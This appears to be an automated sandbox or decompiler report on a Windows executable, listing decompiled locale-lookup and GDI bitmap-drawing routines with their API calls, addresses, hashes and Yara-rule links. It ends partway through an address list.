Instruction ID: 5165d73ab78759282e3f1949edd1452ab1a82c065a3017fb63bc2c3e49ec8ee6
Opcode Fuzzy Hash: 041c2bb2925929663b0ecae354f44c9bed40b2fe769f783fbf9c4f68711966b8
Instruction Fuzzy Hash: C4F0F071E0019D9FCB10DF98C488C9CFBB4FB66341B8042AAC404E7762EB38A6D4CB85

Uniqueness

Uniqueness Score: -1.00%

Function 004099B0, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004099B0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E0040439C(_t10, _t18);
				}
				return E00404438(_t10, _t5 - 1,  &_v260);
			}

0x004099bb
0x004099bd
0x004099d5
0x00000000
0x004099ed
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099CE

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ddd33dce0e503d88d7962fafbd9c999078aa5ac39bb4722e46f592e221fd8b6a
Instruction ID: b9224fc592bef8ad49d1d5790603454ab5765a100b16771532452ef03f01650b
Opcode Fuzzy Hash: ddd33dce0e503d88d7962fafbd9c999078aa5ac39bb4722e46f592e221fd8b6a
Instruction Fuzzy Hash: D1E0D8B170021417D310A6995C82EFBB39C9758710F00027FBE45E73C2EDB49D8042ED

Uniqueness

Uniqueness Score: -1.00%

Function 004099FC, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E004099FC(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}

0x004099ff
0x00409a00
0x00409a16
0x00409a1d
0x00409a18
0x00409a18
0x00409a18
0x00409a23

APIs

GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B03E,00000000,0040B257,?,?,00000000,00000000), ref: 00409A0F

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: b67e5c61a188b82142785b067202d69d9db3b77bf24f59a8fdab4d2f80b15d41
Instruction ID: 407ebcb541465432e8e9f581d1435c11d45821b1de835af80ad0412a319dfbb2
Opcode Fuzzy Hash: b67e5c61a188b82142785b067202d69d9db3b77bf24f59a8fdab4d2f80b15d41
Instruction Fuzzy Hash: DBD05E6630D2902AE220515A2D85DBB4ADCCAC57B0F10403ABA59E7282D2248C0697B5

Uniqueness

Uniqueness Score: -1.00%

Function 004070C2, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004070C2() {

				goto ( *0x493550);
			}

0x004070c4

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fe6ffaeb63bb8438ee972fa4852521c56a088945c5c83bebc042a973736e665
Instruction ID: 6d665e594d59e616f5832c8ad0899d78f354ad1b0a1b336f88f142fc1ef690d8
Opcode Fuzzy Hash: 4fe6ffaeb63bb8438ee972fa4852521c56a088945c5c83bebc042a973736e665
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00420CA0, Relevance: 37.7, APIs: 25, Instructions: 248
windowCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00420CA0(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr* _t78;
				intOrPtr _t87;
				struct HDC__* _t88;
				intOrPtr _t91;
				struct HDC__* _t92;
				struct HDC__* _t135;
				int _t162;
				intOrPtr _t169;
				intOrPtr _t171;
				struct HDC__* _t173;
				int _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t179;

				_t177 = _t178;
				_t179 = _t178 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t173 = __eax;
				_t175 = _a16;
				_t162 = _a20;
				_v13 = 1;
				_t78 =  *0x491294; // 0x4760ac
				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
					_v40 = 0;
					_push(0);
					L00406AE4();
					_v20 = E00420AFC(0);
					_push(_t177);
					_push(0x420f20);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					_push(_t175);
					_push(_t162);
					_push(_a32);
					L00406ADC();
					_v24 = E00420AFC(_a32);
					_v28 = SelectObject(_v20, _v24);
					_push(0);
					_t87 =  *0x492a28; // 0xc20806be
					_push(_t87);
					_t88 = _a32;
					_push(_t88);
					L00406C64();
					_v40 = _t88;
					_push(0);
					_push(_v40);
					_push(_a32);
					L00406C64();
					if(_v40 == 0) {
						_push(0xffffffff);
						_t91 =  *0x492a28; // 0xc20806be
						_push(_t91);
						_t92 = _v20;
						_push(_t92);
						L00406C64();
						_v40 = _t92;
					} else {
						_push(0xffffffff);
						_push(_v40);
						_t135 = _v20;
						_push(_t135);
						L00406C64();
						_v40 = _t135;
					}
					_push(_v20);
					L00406C34();
					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
					_v32 = SetTextColor(_t173, 0);
					_v36 = SetBkColor(_t173, 0xffffff);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
					SetTextColor(_t173, _v32);
					SetBkColor(_t173, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t169);
					 *[fs:eax] = _t169;
					_push(E00420F27);
					if(_v40 != 0) {
						_push(0);
						_push(_v40);
						_push(_v20);
						L00406C64();
					}
					return DeleteDC(_v20);
				} else {
					_push(1);
					_push(1);
					_push(_a32);
					L00406ADC();
					_v24 = E00420AFC(_a32);
					_v24 = SelectObject(_a12, _v24);
					_push(_t177);
					_push(0x420d73);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E004072DC(0xaa0029, 0xcc0020));
					_pop(_t171);
					 *[fs:eax] = _t171;
					_push(E00420F27);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}

0x00420ca1
0x00420ca3
0x00420ca9
0x00420cac
0x00420caf
0x00420cb1
0x00420cb4
0x00420cb7
0x00420cbb
0x00420cc3
0x00420d7c
0x00420d7f
0x00420d81
0x00420d8b
0x00420d90
0x00420d91
0x00420d96
0x00420d99
0x00420d9c
0x00420d9d
0x00420da1
0x00420da2
0x00420dac
0x00420dbc
0x00420dbf
0x00420dc1
0x00420dc6
0x00420dc7
0x00420dca
0x00420dcb
0x00420dd0
0x00420dd3
0x00420dd8
0x00420ddc
0x00420ddd
0x00420de6
0x00420dfc
0x00420dfe
0x00420e03
0x00420e04
0x00420e07
0x00420e08
0x00420e0d
0x00420de8
0x00420de8
0x00420ded
0x00420dee
0x00420df1
0x00420df2
0x00420df7
0x00420df7
0x00420e13
0x00420e14
0x00420e36
0x00420e58
0x00420e65
0x00420e73
0x00420e9a
0x00420ebf
0x00420ec9
0x00420ed3
0x00420edc
0x00420ee6
0x00420ee6
0x00420eef
0x00420ef6
0x00420ef9
0x00420efc
0x00420f05
0x00420f07
0x00420f0c
0x00420f10
0x00420f11
0x00420f11
0x00420f1f
0x00420cdb
0x00420cdb
0x00420cdd
0x00420ce2
0x00420ce3
0x00420ced
0x00420cfd
0x00420d02
0x00420d03
0x00420d08
0x00420d0b
0x00420d47
0x00420d4e
0x00420d51
0x00420d54
0x00420d66
0x00420d72
0x00420d72

APIs

72E7A520.GDI32(?,00000001,00000001,00000000,?,?), ref: 00420CE3
SelectObject.GDI32(?,?), ref: 00420CF8
MaskBlt.GDI32(?,?,?,?,?,?,00000000,004200BB,?,?,?,00000000,00000000,00420D73,?,?), ref: 00420D47
SelectObject.GDI32(?,?), ref: 00420D61
DeleteObject.GDI32(?), ref: 00420D6D
72E7A590.GDI32(00000000,00000000,?,?), ref: 00420D81
72E7A520.GDI32(?,?,?,00000000,00420F20,?,00000000,00000000,?,?), ref: 00420DA2
SelectObject.GDI32(?,?), ref: 00420DB7
72E7B410.GDI32(?,C20806BE,00000000,?,?,?,?,?,00000000,00420F20,?,00000000,00000000,?,?), ref: 00420DCB
72E7B410.GDI32(?,?,00000000,?,C20806BE,00000000,?,?,?,?,?,00000000,00420F20,?,00000000,00000000), ref: 00420DDD
72E7B410.GDI32(?,00000000,000000FF,?,?,00000000,?,C20806BE,00000000,?,?,?,?,?,00000000,00420F20), ref: 00420DF2
72E7B410.GDI32(?,C20806BE,000000FF,?,?,00000000,?,C20806BE,00000000,?,?,?,?,?,00000000,00420F20), ref: 00420E08
72E7B150.GDI32(?,?,C20806BE,000000FF,?,?,00000000,?,C20806BE,00000000,?,?,?,?,?,00000000), ref: 00420E14
StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 00420E36
StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,004200BB,?,?,00440328), ref: 00420E58
SetTextColor.GDI32(?,00000000), ref: 00420E60
SetBkColor.GDI32(?,00FFFFFF), ref: 00420E6E
StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 00420E9A
StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00420EBF
SetTextColor.GDI32(?,004200BB), ref: 00420EC9
SetBkColor.GDI32(?,00000000), ref: 00420ED3
SelectObject.GDI32(?,00000000), ref: 00420EE6
DeleteObject.GDI32(?), ref: 00420EEF
72E7B410.GDI32(?,00000000,00000000,00420F27,?,004200BB,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00420F11
DeleteDC.GDI32(?), ref: 00420F1A

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
String ID:
API String ID: 3348367721-0
Opcode ID: e46734b3120b9fb45e56f05c3c235d6f6d7b806e49154c27e96bb5ae4097e2ef
Instruction ID: 6ce8f87c1483c625ac59be190c9dabbc2dba2da038d769515a819c8c7bb72e09
Opcode Fuzzy Hash: e46734b3120b9fb45e56f05c3c235d6f6d7b806e49154c27e96bb5ae4097e2ef
Instruction Fuzzy Hash: 3681C5B1A04219AFDB50EFA9CD85EAF77FCEB0C714F114459F618E7281C279AD108B68

Uniqueness

Uniqueness Score: -1.00%

Function 00424094, Relevance: 31.7, APIs: 21, Instructions: 194
windowCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00424094(void* __eax, long __ecx, intOrPtr __edx) {
				void* _v8;
				intOrPtr _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				void* _t64;
				int _t65;
				intOrPtr _t66;
				long _t77;
				void* _t107;
				intOrPtr _t116;
				intOrPtr _t117;
				long _t120;
				intOrPtr _t123;
				void* _t127;
				void* _t129;
				intOrPtr _t130;

				_t127 = _t129;
				_t130 = _t129 + 0xffffff90;
				_t120 = __ecx;
				_t123 = __edx;
				_t107 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E00423588(_t107);
					_v12 = 0;
					_v20 = 0;
					_push(_t127);
					_push(0x42428f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t130;
					_push(0);
					L00406EA4();
					_v12 = E00420AFC(0);
					_push(_v12);
					L00406AE4();
					_v20 = E00420AFC(_v12);
					_push(0);
					_push(1);
					_push(1);
					_push(_v108);
					_t64 = _v112;
					_push(_t64);
					L00406ACC();
					_v8 = _t64;
					if(_v8 == 0) {
						L18:
						_t65 = 0;
						_pop(_t116);
						 *[fs:eax] = _t116;
						_push(0x424296);
						if(_v20 != 0) {
							_t65 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							_t66 = _v12;
							_push(_t66);
							_push(0);
							L00407114();
							return _t66;
						}
						return _t65;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(__ecx != 0x1fffffff) {
							_push(_v12);
							L00406AE4();
							_v16 = E00420AFC(_v12);
							_push(_t127);
							_push(0x424247);
							_push( *[fs:eax]);
							 *[fs:eax] = _t130;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t107 = E004239CC(_t107, _t123, _t123, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t107);
							if(_t123 != 0) {
								_push(0);
								_push(_t123);
								_push(_v16);
								L00406C64();
								_push(_v16);
								L00406C34();
								_push(0);
								_push(_t123);
								_push(_v20);
								L00406C64();
								_push(_v20);
								L00406C34();
							}
							_t77 = SetBkColor(_v16, _t120);
							_push(0xcc0020);
							_push(0);
							_push(0);
							_push(_v16);
							_push(_v108);
							_push(_v112);
							_push(0);
							_push(0);
							_push(_v20);
							L00406ABC();
							SetBkColor(_v16, _t77);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t107);
							}
							_pop(_t117);
							 *[fs:eax] = _t117;
							_push(0x42424e);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L18;
						}
					}
				}
			}

0x00424095
0x00424097
0x0042409d
0x0042409f
0x004240a1
0x004240a5
0x004240aa
0x0042429f
0x004240c4
0x004240c6
0x004240cd
0x004240d2
0x004240d7
0x004240d8
0x004240dd
0x004240e0
0x004240e3
0x004240e5
0x004240ef
0x004240f5
0x004240f6
0x00424100
0x00424103
0x00424105
0x00424107
0x0042410c
0x0042410d
0x00424110
0x00424111
0x00424116
0x0042411d
0x00424261
0x00424261
0x00424263
0x00424266
0x00424269
0x00424272
0x00424278
0x00424278
0x00424281
0x00424283
0x00424286
0x00424287
0x00424289
0x00000000
0x00424289
0x0042428e
0x00424123
0x00424130
0x00424139
0x0042415a
0x0042415b
0x00424165
0x0042416a
0x0042416b
0x00424170
0x00424173
0x0042417a
0x0042419a
0x0042417c
0x0042417c
0x00424182
0x00424196
0x00424196
0x004241a8
0x004241ad
0x004241af
0x004241b1
0x004241b5
0x004241b6
0x004241be
0x004241bf
0x004241c4
0x004241c6
0x004241ca
0x004241cb
0x004241d3
0x004241d4
0x004241d4
0x004241de
0x004241e5
0x004241ea
0x004241ec
0x004241f1
0x004241f5
0x004241f9
0x004241fa
0x004241fc
0x00424201
0x00424202
0x0042420c
0x00424215
0x0042421f
0x0042421f
0x00424228
0x0042422b
0x0042422b
0x00424232
0x00424235
0x00424238
0x00424246
0x0042413b
0x0042414d
0x00424252
0x0042425c
0x0042425c
0x00000000
0x00424252
0x00424139
0x0042411d

APIs

GetObjectA.GDI32(00000000,00000054,?), ref: 004240B7
72E7AC50.USER32(00000000,00000000,0042428F,?,00000000,?,?), ref: 004240E5
72E7A590.GDI32(?,00000000,00000000,0042428F,?,00000000,?,?), ref: 004240F6
72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,0042428F,?,00000000,?,?), ref: 00424111
SelectObject.GDI32(?,00000000), ref: 0042412B
PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0042414D
72E7A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,0042428F,?,00000000,?,?), ref: 0042415B
SelectObject.GDI32(00000000,00000000), ref: 004241A3
72E7B410.GDI32(00000000,?,00000000,00000000,00000000,00000000,00424247,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 004241B6
72E7B150.GDI32(00000000,00000000,?,00000000,00000000,00000000,00000000,00424247,?,?,?,00000000,?,?,00000001,00000001), ref: 004241BF
72E7B410.GDI32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00424247,?,?,?,00000000,?), ref: 004241CB
72E7B150.GDI32(?,?,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00424247,?,?,?,00000000), ref: 004241D4
SetBkColor.GDI32(00000000,00000000), ref: 004241DE
72E897E0.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,00000000,00000000,00424247), ref: 00424202
SetBkColor.GDI32(00000000,00000000), ref: 0042420C
SelectObject.GDI32(00000000,00000000), ref: 0042421F
DeleteObject.GDI32(00000000), ref: 0042422B
DeleteDC.GDI32(00000000), ref: 00424241
SelectObject.GDI32(?,00000000), ref: 0042425C
DeleteDC.GDI32(00000000), ref: 00424278
72E7B380.USER32(00000000,00000000,00424296,00000001,00000000,?,00000000,00000000,0042428F,?,00000000,?,?), ref: 00424289

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Select$Delete$A590B150B410Color$A410B380E897
String ID:
API String ID: 4241548881-0
Opcode ID: efd29665ad503f4d1ef7893cc3222d24c0768795bcd152504a68a89435ba3650
Instruction ID: efd02d1a875929a6837f3824ff537185af59d8eb039b0b63219b306ede86c4ac
Opcode Fuzzy Hash: efd29665ad503f4d1ef7893cc3222d24c0768795bcd152504a68a89435ba3650
Instruction Fuzzy Hash: F7516E71F04324ABDB10EBEADC45FAEB7FCEB48704F51446AB614F7281C67899408B68

Uniqueness

Uniqueness Score: -1.00%

Function 00424E90, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 351
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00424E90(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v16;
				struct HDC__* _v20;
				char _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				intOrPtr _v44;
				void* _v48;
				struct HDC__* _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t163;
				void* _t166;
				void* _t174;
				void* _t183;
				signed int _t188;
				intOrPtr _t189;
				struct HDC__* _t190;
				struct HDC__* _t204;
				signed int _t208;
				signed short _t214;
				intOrPtr _t241;
				intOrPtr* _t245;
				intOrPtr _t251;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t295;
				signed int _t297;
				signed int _t317;
				void* _t319;
				void* _t320;
				signed int _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				intOrPtr _t325;

				_t316 = __edi;
				_t323 = _t324;
				_t325 = _t324 + 0xffffff54;
				_t319 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 8))(__edi, __esi, __ebx, _t322);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E00402754(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t323);
				_push(0x4253ad);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_push(_t323);
				_push(0x425380);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 8))();
					_t320 = _t319 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E004035AC(1);
						if(_a4 == 0) {
							E00402EF0( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t320;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0xc))();
						 *((intOrPtr*)( *_v60 + 0xc))();
						 *((intOrPtr*)( *_v60 + 0xc))();
						E00416B50(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
						 *((intOrPtr*)( *_v60 + 0x10))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 8))();
					_t251 = _v64;
					E00402EF0(_t251, 0x28);
					_t241 = _t251;
					 *(_t241 + 4) = _v72 & 0x0000ffff;
					 *(_t241 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t241 + 0xc)) = _v68;
					 *((short*)(_t241 + 0xe)) = _v66;
					_t320 = _t319 - 0xc;
				}
				_t245 = _v64;
				 *_t245 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t245 + 0xc)) != 1) {
					E004209DC();
				}
				if(_v36 == 0x28) {
					_t214 =  *(_t245 + 0xe);
					if(_t214 == 0x10 || _t214 == 0x20) {
						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
							E00416AE0(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t320 = _t320 - 0xc;
						}
					}
				}
				if( *(_t245 + 0x20) == 0) {
					 *(_t245 + 0x20) = E00420C6C( *(_t245 + 0xe));
				}
				_t317 = _v37 & 0x000000ff;
				_t257 =  *(_t245 + 0x20) * 0;
				E00416AE0(_v12,  *(_t245 + 0x20) * 0, _v32);
				_t321 = _t320 -  *(_t245 + 0x20) * 0;
				if( *(_t245 + 0x14) == 0) {
					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
					_t208 = E00420C8C( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
					asm("cdq");
					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
				}
				_t160 =  *(_t245 + 0x14);
				if(_t321 > _t160) {
					_t321 = _t160;
				}
				if(_v37 != 0) {
					_t160 = E00420F34(_v32);
				}
				_push(0);
				L00406EA4();
				_v16 = E00420AFC(_t160);
				_push(_t323);
				_push(0x4252fb);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_t163 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t163 == 0 || _t163 == 3) {
					if( *0x476514 == 0) {
						_push(0);
						_push(0);
						_push( &_v24);
						_push(0);
						_push(_v28);
						_t166 = _v16;
						_push(_t166);
						L00406AEC();
						_v44 = _t166;
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040B30C(_t245, _t257, _t317, _t321);
							} else {
								E004209DC();
							}
						}
						_push(_t323);
						_push( *[fs:eax]);
						 *[fs:eax] = _t325;
						E00416AE0(_v12, _t321, _v24);
						_pop(_t289);
						 *[fs:eax] = _t289;
						_t290 = 0x4252ca;
						 *[fs:eax] = _t290;
						_push(E00425302);
						_t174 = _v16;
						_push(_t174);
						_push(0);
						L00407114();
						return _t174;
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E00402754(_t321);
					_push(_t323);
					_push(0x425263);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_t263 = _t321;
					E00416AE0(_v12, _t321, _v24);
					_push(_v16);
					L00406AE4();
					_v20 = E00420AFC(_v16);
					_push(1);
					_push(1);
					_t183 = _v16;
					_push(_t183);
					L00406ADC();
					_v48 = SelectObject(_v20, _t183);
					_v56 = 0;
					_t188 =  *(_v64 + 0x20);
					if(_t188 > 0) {
						_t263 = _t188;
						_v52 = E004211EC(0, _t188);
						_push(0);
						_push(_v52);
						_t204 = _v20;
						_push(_t204);
						L00406C64();
						_v56 = _t204;
						_push(_v20);
						L00406C34();
					}
					_push(_t323);
					_push(0x425237);
					_push( *[fs:edx]);
					 *[fs:edx] = _t325;
					_push(0);
					_t189 = _v28;
					_push(_t189);
					_push(_v24);
					_push(4);
					_push(_t189);
					_t190 = _v20;
					_push(_t190);
					L00406AF4();
					_v44 = _t190;
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040B30C(_t245, _t263, _t317, _t321);
						} else {
							E004209DC();
						}
					}
					_pop(_t295);
					 *[fs:eax] = _t295;
					_push(E0042523E);
					if(_v56 != 0) {
						_push(0xffffffff);
						_push(_v56);
						_push(_v20);
						L00406C64();
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}

0x00424e90
0x00424e91
0x00424e93
0x00424e9c
0x00424e9e
0x00424ea1
0x00424ea6
0x00424eab
0x00424eb0
0x00424ec0
0x00424ec7
0x00424ecf
0x00424ed1
0x00424ed1
0x00424ee8
0x00424eee
0x00424ef3
0x00424ef4
0x00424ef9
0x00424efc
0x00424f01
0x00424f02
0x00424f07
0x00424f0a
0x00424f11
0x00424f70
0x00424f73
0x00424f79
0x00424f7f
0x00424f99
0x00424fa0
0x00424faf
0x00424fb4
0x00424fc2
0x00424fce
0x00424fce
0x00424fde
0x00424fee
0x00425002
0x00425011
0x00425023
0x00425029
0x00425029
0x00424f13
0x00424f23
0x00424f26
0x00424f32
0x00424f37
0x00424f3d
0x00424f44
0x00424f4b
0x00424f53
0x00424f57
0x00424f57
0x0042502c
0x00425032
0x0042503a
0x00425042
0x00425044
0x00425044
0x0042504d
0x0042504f
0x00425057
0x00425063
0x00425070
0x00425075
0x00425079
0x00425079
0x00425063
0x00425057
0x00425080
0x0042508b
0x0042508b
0x00425091
0x0042509d
0x004250a6
0x004250b8
0x004250be
0x004250c0
0x004250cc
0x004250d6
0x004250db
0x004250de
0x004250de
0x004250e1
0x004250e6
0x004250e8
0x004250e8
0x004250ee
0x004250f3
0x004250f3
0x004250f8
0x004250fa
0x00425104
0x00425109
0x0042510a
0x0042510f
0x00425112
0x00425118
0x0042511d
0x0042512b
0x0042526a
0x0042526c
0x00425271
0x00425272
0x00425277
0x00425278
0x0042527b
0x0042527c
0x00425281
0x00425288
0x00425297
0x004252a0
0x00425299
0x00425299
0x00425299
0x00425297
0x004252a7
0x004252ad
0x004252b0
0x004252bb
0x004252c2
0x004252c5
0x004252e4
0x004252e7
0x004252ea
0x004252ef
0x004252f2
0x004252f3
0x004252f5
0x004252fa
0x00000000
0x00000000
0x00000000
0x00425131
0x00425131
0x00425133
0x0042513d
0x00425142
0x00425143
0x00425148
0x0042514b
0x00425151
0x00425156
0x0042515e
0x0042515f
0x00425169
0x0042516c
0x0042516e
0x00425170
0x00425173
0x00425174
0x00425183
0x00425188
0x0042518e
0x00425193
0x00425195
0x004251a1
0x004251a4
0x004251a9
0x004251aa
0x004251ad
0x004251ae
0x004251b3
